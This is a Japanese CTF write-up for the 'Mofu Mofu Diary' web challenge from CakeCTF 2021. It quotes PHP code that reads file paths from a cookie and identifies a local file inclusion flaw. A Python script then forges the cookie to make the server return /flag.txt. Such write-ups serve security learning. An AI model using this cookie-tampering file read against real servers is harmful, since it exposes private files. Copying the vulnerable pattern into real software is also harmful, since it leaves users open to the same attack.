# [Web] Mofu Mofu Diary - Cake CTF 2021 ###### tags: `CakeCTF 2021` ソースコードが小さいので読む。 `util.php`をみると色々ある ```php= <?php function img2b64($image) { return 'data:jpg;base64,'.base64_encode(file_get_contents($image)); } function get_cached_contents() { $results = []; if (empty($_COOKIE['cache'])) { // snip } else { $cache = json_decode($_COOKIE['cache'], true); if ($cache['expiry'] <= time()) { $expiry = time() + 60*60*24*7; for($i = 0; $i < count($cache['data']); $i++) { $result = $cache['data'][$i]; $_SESSION[$result['name']] = img2b64($result['name']); } $cookie = array('data' => $cache['data'], 'expiry' => $expiry); setcookie('cache', json_encode($cookie), $expiry); } return $cache['data']; } return $results; } ?> ``` どうやら画像データと説明を`cache`という名前のcookieに入れているらしい。また、それが有効かどうかを`expiry`で判断していて、キャッシュが切れていたらデータを再読込している。 ここで`img2b64`をみると、`cache`からとってきたパスを`file_get_contents`している。**LFI**がありそう `cache` の値を拾ってきて`expiry`を過去の値にして、適当な画像の `name` を `/flag.txt` などとすればそれをbase64したものが手に入りそう ペイロードはこういう感じで作る ```python= import urllib.parse import json data = """ %7B%22data%22%3A%5B%7B%22name%22%3A%22%5C%2Fflag.txt%22%2C%22description%22%3A%22cute%20cat%22%7D%2C%7B%22name%22%3A%22images%5C%2F02.jpg%22%2C%22description%22%3A%22When%20you%20gaze%20into%20the%20cat%2C%20the%20cat%20gazes%20into%20you%22%7D%2C%7B%22name%22%3A%22images%5C%2F03.jpg%22%2C%22description%22%3A%22Fox%20villege%20%3A%29%22%7D%2C%7B%22name%22%3A%22images%5C%2F04.jpg%22%2C%22description%22%3A%22TV%20cat%22%7D%2C%7B%22name%22%3A%22images%5C%2F05.jpg%22%2C%22description%22%3A%22Smiling%20emu%22%7D%2C%7B%22name%22%3A%22images%5C%2F06.jpg%22%2C%22description%22%3A%22This%20lemur%20often%20sits%20someone%27s%20shoulder%22%7D%2C%7B%22name%22%3A%22images%5C%2F07.jpg%22%2C%22description%22%3A%22Capybara%20is%20not%20as%20fluffy%20as%20you%20may%20imagine%22%7D%2C%7B%22name%22%3A%22images%5C%2F08.jpg%22%2C%22description%22%3A%22There%20were%20several%20serval%20cats%22%7D%2C%7B%22name%22%3A%22images%5C%2F09.jpg%22%2C%22description%22%3A%22Neko%20cafe%20%40%20Akihabara%22%7D%5D%2C%22expiry%22%3A1629989268%7D """ data= json.loads(urllib.parse.unquote(data)) print(data) data["expiry"] = 0 data["data"][0] = {"name": "/flag.txt", "description": "cute cat"} print(urllib.parse.quote(json.dumps(data))) ```